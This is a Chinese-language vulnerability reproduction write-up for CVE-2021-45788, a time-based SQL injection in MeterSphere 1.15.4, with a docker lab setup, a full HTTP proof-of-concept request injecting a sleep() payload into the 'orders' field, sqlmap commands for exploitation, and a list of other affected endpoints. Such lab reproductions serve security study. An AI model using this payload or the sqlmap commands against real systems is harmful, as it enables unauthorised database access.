【漏洞复现】CVE-2021-45788 SQL Injection

Mitch3112024-12-24 17:58

漏洞信息

NVD - cve-2021-45788

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the "orders" parameter.

Authenticated users can control the parameters in the "order by" statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页:https://metersphere.io/

源码:https://github.com/metersphere/metersphere

环境搭建

docker-compose.yml

yaml 复制代码 
version: "2.1"
services:
  web:
    image: vulhub/metersphere:1.15.4
    ports:
      - "8081:8081"
      - "5005:5005"
    environment:
      MYSQL_SERVER: db:3306
      MYSQL_DB: metersphere
      MYSQL_USERNAME: root
      MYSQL_PASSWORD: root
      KAFKA_SERVER: kafka:9092
  db:
    image: mysql:5.7
    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
    environment:
    - MYSQL_ROOT_PASSWORD=root
    - MYSQL_DATABASE=metersphere
  kafka:
    image: bitnami/kafka:3.4.1
    environment:
      # KRaft settings
      - KAFKA_CFG_NODE_ID=0
      - KAFKA_CFG_PROCESS_ROLES=controller,broker
      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
      # Listeners
      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI:http://127.0.0.1:8081

账号admin、密码metersphere

漏洞复现

参考: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

登录Web UI后进入http://127.0.0.1:8081/#/track/case/all创建新的测试用例:

POC:

http 复制代码 
POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close
{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

if分支执行:

else分支执行:

基于此可以验证存在时间盲注,通过sqlmap或者自己写爆破脚本实现漏洞利用:

sh 复制代码 
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

此外,这个漏洞还存在于很多其他接口:

basic 复制代码 
/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}

漏洞分析

漏洞source位于backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java:

漏洞sink位于backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml:

相关推荐
HackKong3 分钟前
2025年黑客技术之网络安全简介(入门篇)
安全·web安全·网络安全·黑客技术
feng_blog66886 小时前
【docker-1】快速入门docker
java·docker·eureka
Amd7946 小时前
深入探讨索引的创建与删除:提升数据库查询效率的关键技术
数据结构·sql·数据库管理·索引·性能提升·查询优化·数据检索
小池先生7 小时前
grafana+prometheus监控linux指标
linux·grafana·prometheus
dot.Net安全矩阵11 小时前
拒绝 Github 投毒,通过 Sharp4SuoBrowser 分析 Visual Studio 隐藏文件
ide·安全·web安全·github·.net·.netcore·visual studio
橘子在努力11 小时前
【橘子ES】使用docker搭建ELK环境
elk·elasticsearch·docker
超级阿飞12 小时前
利用Kubespray安装生产环境的k8s集群-排错篇
docker·容器·kubernetes
斯普信专业组13 小时前
云原生时代,如何构建高效分布式监控系统
分布式·云原生·prometheus
小屁不止是运维13 小时前
麒麟操作系统服务架构保姆级教程(十四)iptables防火墙四表五链和防火墙应用案例
安全·web安全·架构·iptables·防火墙
Amctwd13 小时前
【Docker】私有Docker仓库的搭建
spring cloud·docker·eureka
热门推荐
012023美赛A题之Lotka-Volterra【完整思路+代码】02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04机器人持续学习基准LIBERO系列10——文件结构05Windows10安装PCL1.14.0及点云配准06密码学原理技术-第六章-introduction to pulibc-key cryptography07RAG 实践- Ollama+RagFlow 部署本地知识库08xgboost: Why not implement distributed XGBoost on top of spark09(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明10医疗图像处理2023:Transformers in medical imaging: A survey